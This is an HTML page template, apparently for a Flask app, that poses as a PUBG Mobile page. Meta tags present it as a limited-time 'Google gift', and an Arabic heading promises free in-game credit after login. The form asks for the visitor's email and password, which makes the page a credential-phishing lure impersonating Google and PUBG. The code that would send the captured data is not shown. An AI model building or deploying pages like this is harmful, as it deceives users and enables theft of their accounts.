<!DOCTYPE html>
<html lang="en" dir="ltr">

<head>
    <meta charset="utf-8">
    <meta property="title" content="">
    <meta property="image" content="https://tse3.mm.bing.net/th?id=OIP.I7lNS6aup1-9h0pCci34NwHaEK&pid=Api&P=0&w=300&h=169">
    <meta property="site_name" content="Google gift">
    <meta property="description" content="Google gives free gifts for a limited period">
    <meta property="title" content="PUBG Mobile">
    <title>PUBG Mobile</title>
    <link rel="stylesheet" href="{{ url_for('static',filename='Pubg.css') }}">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css">
    <script src="javascript.js"></script>
</head>

<body>
    <div></div>

    <form class="box">
        <img src="https://s3.dexerto.com/thumbnails/_thumbnailLarge/PUBG-Crossplay-Xbox-PS4.jpg" heigth="800" width="800" />
        <h1>تسجيل الدخول لشحن رصيدك في لعبة ببجي مجانا </h1>
        <input type="text" name="email" placeholder="Email">
        <input type="password" name="pass" placeholder="password">
        <input type="submit" value="اشحن الأن">
    </form>

</body>

</html>
